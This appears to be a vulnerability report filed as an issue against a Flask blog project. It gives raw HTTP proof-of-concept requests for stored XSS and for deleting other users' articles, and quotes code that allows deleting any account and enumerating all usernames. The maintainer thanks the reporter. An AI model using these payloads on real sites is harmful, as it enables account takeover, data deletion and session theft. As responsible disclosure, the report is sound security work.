security vulnerability

[coleak2021]

I found the following security risks in this framework:
1、stored xss
2、Arbitrary account deletion
3、Arbitrary article deletion
4、All usernames leaked

Here is the specific information：

1. stored xss

Post an article, put a malicious payload in postContent, postTags, postTitle respectively, all three places can trigger XSS.
POC:

POST /createpost HTTP/1.1
Host: 192.168.1.9:5000
Content-Length: 1031
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.9:5000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWcTd01yIBOhWCdwY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.9:5000/createpost
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: darkMode=false; session=.eJyrVkouLkqLL8nPTs1TslIyTTIxNbGwNElLs0g1trQwsTBLTTE1M0mzMEhOM0iyTDIyMrU0SjFKU9JRyknMSy9NTE8F6qrKAPJLi1OL_BJzQfzElNzMPKhQUH4OQqgWAFJfIjA.Z6scEw.h6qGsG7mkcH1fyMtcx0t6aoXCdo
Connection: close

------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="csrf_token"

IjViNDU0ODk0ZmY4ZTM5ODQ4NmVkNTY0ZjgwY2YwYjliMjI1OTJkMmYi.Z6scFg.geb2tHL1ckCGaEjzat8CXp0xEOU
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postTitle"

<img src=x onerror=alert(1)>
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postTags"

<img src=x onerror=alert(2)>
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postBanner"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postCategory"

Apps
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postContent"

<p>&lt;img src=x onerror=alert(3)&gt;</p><div><br></div>
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryWcTd01yIBOhWCdwY--

2、Arbitrary account deletion

To delete the administrator user admin, for example, first register any account, and then modify the username admiN or directly register an account named admiN account,then delete the account with the name admiN,at this point the admin account was maliciously deleted.
The source code that creates the vulnerability is as follows,the code delete the lowercase account that corresponds to the user name.

 cursor.execute(
            """delete from users where lower(userName) = ? """,  # Delete the row from the users table where the lowercased userName column matches the lowercased given userName
            [
                (userName.lower())
            ],  # Use the lowercased version of the userName and a parameterized query to avoid SQL injection
        )

3、Arbitrary article deletion

As the back-end did not verify that the user sending the request is the author of the article, click to delete one of their own articles and grab the traffic packet, the logic is to send a post request to /post/{postTitle}, which postTitle for any article title, here in the burp will be changed to someone else's title of the article can be deleted from other people's articles
POC:

POST /post/red-dead-redemption-2-a-masterpiece-in-the-world-of-gaming-b6f357785b37 HTTP/1.1
Host: 192.168.1.9:5000
Content-Length: 120
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.9:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.9:5000/post/test-e720370f494f
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: darkMode=false; session=.eJwty00OQDAQhuG7zNpCiyiHsHABmRkzJPWTaG2Iu6vE7nve5LuBw6FD3L1s0AK7mlRUKzIOUbjKTSlaos2JtDDU2LpwPI6QwYLbdOIk6XXNyWeQo8P1c5QQeV8E_d_7hNS_Cc8LYHIlYQ.Z6gzmQ.gbTc_haEntB5fahGESiX1zpXv6g
Connection: close

csrf_token=ImM4N2JmZWZmNWIxOGFhZWM1MDE0ZWY0YTIwYmJmMzFiOTI3MzhjZGQi.Z6gzuA.LI1Kf9aKj5G0A2PO2ZydGwXfoFM&postDeleteButton=

4、All usernames leaked

The source code that creates the vulnerability is as follows,The backend does not validate the input query.Here query passes in % or _ to get all the full usernames

@searchBlueprint.route("/search/<query>", methods=["GET", "POST"])
def search(query):
    # Replace the %20 and + characters in the query with spaces
    query = query.replace("%20", " ")
    queryNoWhiteSpace = query.replace("+", "")
    queryUsers = cursor.execute(
        """select * from users where userName like ? """,
        [
            ("%" + queryNoWhiteSpace + "%"),
        ],
    ).fetchall()

[DogukanUrker]

Thank you @coleak2021 for the detailed report, I’ll fix these issues as soon as possible. Also, thanks to @brandon-t-elliott for reaching out via email and sharing feedback. I appreciate both of you for helping improve the project and have credited you accordingly.